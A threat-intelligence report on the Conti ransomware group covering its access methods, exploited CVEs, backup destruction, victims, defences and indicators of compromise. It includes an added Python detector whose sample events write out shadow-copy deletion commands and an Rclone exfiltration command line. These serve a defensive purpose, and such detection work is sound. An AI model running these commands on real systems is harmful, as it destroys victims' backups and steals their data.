
A Detailed Look Into Conti Ransomware’s Tactics


Research and Analysis December 17, 2021

Origin : 2020

Alias : Ransom.Conti

Infection Vectors : Spam emails, Phishing, Spear-phishing, Vulnerability exploitation, Malware distribution networks, Stolen credentials, Fake software

Targeted Sectors : Information Technology, Government, Legal Services, Enterprise Services, Real Estate, Healthcare, Education, Transportation, Manufacturing, Electronics, NGOs, and Finance

Targeted Regions : North America, Western Europe, Eastern Europe, Eastern Asia

Motive : Data theft, Financial gains (via Ransom)

Introduction

Active since 2020, the Conti ransomware actors specifically target Microsoft Windows systems. The group operates as Ransomware-as-a-Service (RaaS) and is believed to be Russian-speaking. Conti prefers victims that will prioritize rapid restoration of their encrypted data, such as critical and emergency services. A report by the Swiss security firm Prodaft revealed that the group collected nearly $25.5 million in ransoms over the preceding five months (as of November 2021). Its operators threaten non-paying victims with publication of stolen data on the group's dedicated data leak site.

Alongside refining its double extortion scheme, the Conti group has developed a methodology for removing backups, which restricts a victim's ability to restore encrypted or stolen data. Thus far, the group remains active.

Infection and Execution

The attack strategies by Conti can be split into a two-phase process.

First Phase - Initial Access

In the first phase, Conti operators gain initial access to networks using a variety of techniques. They have been observed running spear-phishing campaigns that deliver malicious Word attachments carrying embedded scripts which download or drop additional malware such as TrickBot and IcedID. The group commonly uses Cobalt Strike for lateral movement and the later stages of the intrusion, with the ultimate goal of deploying the Conti ransomware. Other observed access methods include stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls (social engineering), fake software promoted through search engine optimization, malware distribution networks (e.g., ZLoader), and exploitation of common vulnerabilities in externally facing assets.

Second Phase - Execution

In the execution phase, the attackers first run a lightweight getuid payload as a status check before launching a more aggressive payload, which reduces the risk of triggering antivirus engines. CISA and the FBI report that Conti actors use Router Scan, a penetration testing tool, to scan for and brute-force routers, cameras, and network-attached storage (NAS) devices with web interfaces. The actors also use Kerberos attacks to try to obtain the Admin hash, which they then subject to offline brute forcing.

To maintain persistence on victim networks, the actors use legitimate remote monitoring and management (RMM) software and remote desktop software as backdoors. They work with tools already present on the victim network and, where needed, bring in others such as Windows Sysinternals utilities and Mimikatz to collect users' password hashes and clear-text credentials. These credentials let them escalate privileges within the domain and carry out further post-exploitation and lateral movement tasks. In some cases, TrickBot is used for post-exploitation tasks.

In August 2021, a disgruntled Conti affiliate leaked a playbook describing the group's operations. Analysis of this playbook showed that the affiliates exploited several vulnerabilities in unpatched assets to move laterally and escalate privileges: the 2017 Windows Server Message Block (SMB) 1.0 server vulnerabilities (MS17-010, the flaws exploited by EternalBlue), the ProxyShell vulnerabilities in Microsoft Exchange, the PrintNightmare vulnerability (CVE-2021-34527) in the Windows Print Spooler service, and the Zerologon vulnerability (CVE-2020-1472) in Active Directory domain controllers. Artifacts leaked with the playbook identified four Cobalt Strike server Internet Protocol (IP) addresses that Conti had used for command and control (C2). Conti has been observed using different Cobalt Strike servers for different victims.

For data exfiltration, Conti affiliates have used Rclone, a legitimate command-line tool for syncing files to cloud storage. After stealing and encrypting the victim's sensitive data, they apply double extortion: they demand a ransom for the release of the encrypted data and threaten to publicly leak the stolen data if the ransom is not paid.

The Targets

According to the FBI, Conti is responsible for more than 400 cyberattacks against organizations around the world, roughly 75% of them located in the U.S. The group mostly targets mid-sized to large enterprises; named victims include Nordic Choice Hotels, Ireland's Health Service Executive, Kisters AG, Graff, Global Sales Solutions Line, and Florida's Broward County Public Schools (from which the attackers demanded $40 million), among many others. Ransom amounts are scaled to the size of the organization and its ability to pay. Conti has a reputation for targeting organizations where IT outages can lead to life-threatening situations, such as hospitals, emergency medical services, emergency dispatch carriers, and law enforcement agencies.

Ninja Technique of Destroying Backups

If a victim holds backups of the data Conti encrypted and is able to restore from them, the ransom loses its leverage, so Conti has developed expertise in removing backups, with particular focus on Veeam, a widely deployed backup and disaster-recovery product. The group typically starts with spam messages that lead to installation of a Cobalt Strike Beacon, then installs a legitimate remote management agent such as Atera or AnyDesk for persistence in the targeted network. Operating through Atera, a legitimate and widely used agent, helps keep the Cobalt Strike activity from standing out to endpoint detection platforms. Alongside Atera, the group sometimes uses Ngrok, a cross-platform tunneling tool, to expose a local host through an outbound tunnel and exfiltrate data without raising alerts. Finally, to make sure the victim cannot recover, the attackers obtain access to the Veeam environment, manually delete the Veeam backups, and encrypt the victim's systems, leaving the victim with few options.

Moreover, the group recruits affiliates with experience in identifying, locating, and deactivating backups.

Preventive Measures

To defend against Conti, experts recommend regular employee awareness training and enforcement of email security controls. Organizations should inventory and monitor externally exposed endpoints to reduce the risk of VPN compromise and TrickBot delivery, and should segment their networks (for example with a tiered administration model) to limit lateral movement. Command-line interpreters should be audited or restricted through application allowlisting, and process execution should be logged together with full command-line arguments; that logging is what makes command-line exfiltration tools such as Rclone visible to defenders. Experts also recommend hardening Veeam specifically: dedicated security controls for the backup infrastructure, password rotation, and account-security measures such as multi-factor authentication and least-privilege access, to prevent takeover of Veeam accounts.
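The recommendation above to log process execution with command-line arguments only pays off if something reads those logs. The following Python is an added example, not code from the original briefing, from CISA, or from the leaked Conti materials: it applies detection logic to constructed process-creation events (in the shape of Sysmon Event ID 1 or Windows 4688 records reduced to image path and command line) and flags two behaviours this briefing describes: Rclone exfiltration, including a renamed rclone.exe, and shadow-copy deletion through vssadmin.exe, which also appears in the "Processes Created" indicators at the end of this page. The rclone flag list, the sample hostnames, paths and the renamed binary name are assumptions made for illustration.

```python
"""Flag Conti-style post-exploitation command lines in process-creation logs.

Added example for this briefing; not code from the original page, from CISA,
or from the Conti playbook. The events below are constructed to resemble
Sysmon Event ID 1 / Windows 4688 records reduced to image path and command
line; the rclone flag list and the sample paths are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Flags that are specific to rclone; a renamed rclone.exe still needs them.
RCLONE_FLAGS = {
    "--config", "--transfers", "--multi-thread-streams", "--ignore-existing",
    "--auto-confirm", "--max-age", "--bwlimit", "--no-check-certificate",
    "--progress", "--checkers",
}
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "config"}

# An rclone remote is "name:" or "name:path" with a name of two or more
# characters; the negative lookahead rejects drive specs such as C:\ and URLs.
RCLONE_REMOTE = re.compile(r"(?<![\w\\.])[A-Za-z][\w-]+:(?![\\/])")

# Built-in utilities commonly abused to destroy volume shadow copies and
# Windows backup catalogs before encryption.
SHADOW_PATTERNS = {
    "vssadmin.exe": re.compile(r"delete\s+shadows|resize\s+shadowstorage", re.I),
    "wmic.exe": re.compile(r"shadowcopy\s+delete", re.I),
    "wbadmin.exe": re.compile(r"delete\s+(catalog|systemstatebackup)", re.I),
}

# Quoted arguments (UNC paths with spaces) stay as single tokens.
TOKEN = re.compile(r'"[^"]*"|\S+')


def _rclone_flags(tokens):
    """Return the long options in the token list, with any =value stripped."""
    return {t.split("=", 1)[0].lower() for t in tokens if t.startswith("--")}


def classify(event):
    """Return the list of rule names that match one process-creation event."""
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["command_line"]
    tokens = TOKEN.findall(cmd)
    hits = []

    if image == "rclone.exe":
        hits.append("rclone_binary")
    else:
        # A renamed copy betrays itself through rclone's own grammar:
        # a subcommand plus rclone-only flags, or a flag plus a remote spec.
        has_subcommand = any(t.lower() in RCLONE_SUBCOMMANDS for t in tokens[1:])
        flag_hits = len(_rclone_flags(tokens) & RCLONE_FLAGS)
        has_remote = RCLONE_REMOTE.search(cmd) is not None
        if has_subcommand and (flag_hits >= 2 or (flag_hits >= 1 and has_remote)):
            hits.append("renamed_rclone")

    pattern = SHADOW_PATTERNS.get(image)
    if pattern is not None and pattern.search(cmd):
        hits.append("shadow_copy_tampering")
    return hits


def scan(events):
    """Return (event id, rule) pairs for every event that matches a rule."""
    return [(e["id"], rule) for e in events for rule in classify(e)]


# Constructed sample events; hostnames, paths and the renamed binary are invented.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\SysWOW64\vssadmin.exe",
     "command_line": "vssadmin.exe Delete Shadows /all /quiet"},
    {"id": 2, "image": r"C:\ProgramData\svchost.exe",  # rclone renamed to blend in
     "command_line": 'svchost.exe copy "\\\\FILESRV01\\Finance" mega:exfil -q '
                     "--ignore-existing --auto-confirm --multi-thread-streams 12 "
                     "--transfers 12"},
    {"id": 3, "image": r"C:\Tools\rclone.exe",
     "command_line": "rclone.exe config"},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c dir C:\Users"},
    {"id": 5, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic shadowcopy delete"},
    {"id": 6, "image": r"C:\Program Files\Backup\copy.exe",  # one flag, no subcommand
     "command_line": "copy.exe --transfers 4"},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The renamed-binary rule is the one worth tuning in production: the file name is trivially changed by an attacker, while the argument grammar (subcommand, rclone-only flags, `remote:path` targets) is not, so it should drive the alert rather than the image name alone. Event 6 shows the deliberate false-positive guard: a single rclone-looking flag without a subcommand does not fire.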

Conclusion

Conti has been active for more than a year and is already considered one of the most dangerous ransomware operations, one that aims to leave organizations no way to recover their data. The group goes as far as destroying backups to bring victim organizations to their knees. Against a threat this grave, organizations need to raise their defenses accordingly. The group is still at large and is expected to continue its operations.

Indicators of Compromise

Encrypted Files Extension

.CONTI

Ransom Demand Message

CONTI_README[.]txt

Cyber Criminal Contact

mantiticvi1976@protonmail[.]com

fahydremu1981@protonmail[.]com

frosculandra1975@protonmail[.]com

trafyralhi1988@protonmail[.]com

sanctornopul1986@protonmail[.]com

ringpawslanin1984@protonmail[.]com

liebupneoplan19@protonmail[.]com

stivobemun1979@protonmail[.]com

guifullcharti1970@protonmail[.]com

phrasitliter1981@protonmail[.]com

elsleepamlen1988@protonmail[.]com

southbvilolor1973@protonmail[.]com

glocadboysun1978@protonmail[.]com

carbedispgret1983@protonmail[.]com

listun@protonmail[.]com

mirtum@protonmail[.]com

maxgary777@protonmail[.]com

ranosfinger@protonmail[.]com

bootsdurslecne1976@protonmail[.]com

rinmayturly1972@protonmail[.]com

niggchiphoter1974@protonmail[.]com

lebssickronne1982@protonmail[.]com

daybayriki1970@protonmail[.]com

MD5

196b1e6992650c003f550404f6b1109f

SHA1

6b1213966652f31cc333d9f1db64cb520c2256ec

SHA256

844cc2551f8bbfd505800bd3d135d93064600a55c45894f89f80b81fea3b0fa1

SSDEEP

384:yRcf5+y19sfna80LQiwvoh2fTuMl2t+JCeAxaBtmFU7qFFdjSfwaqkSTepQJb49Q:KcB+hClQ3vTLuMl2toIaCFIvROr

Files Dropped

C:\conti_readme[.]txt

C:\documents and settings\conti_readme[.]txt

C:\far2\addons\colors\conti_readme[.]txt

C:\far2\addons\conti_readme[.]txt

C:\far2\conti_readme[.]txt

D:\conti_readme[.]txt

<REM_DRIVE>:\1189[.]jpeg

<REM_DRIVE>:\1189[.]jpeg[.]conti

<REM_DRIVE>:\1189[.]jpg

<REM_DRIVE>:\1189[.]jpg[.]conti

Processes Created

<PATH_SAMPLE[.]EXE>

%WINDIR%\syswow64\cmd[.]exe

<SYSTEM32>\conhost[.]exe

%WINDIR%\syswow64\vssadmin[.]exe

<SYSTEM32>\vssvc[.]exe
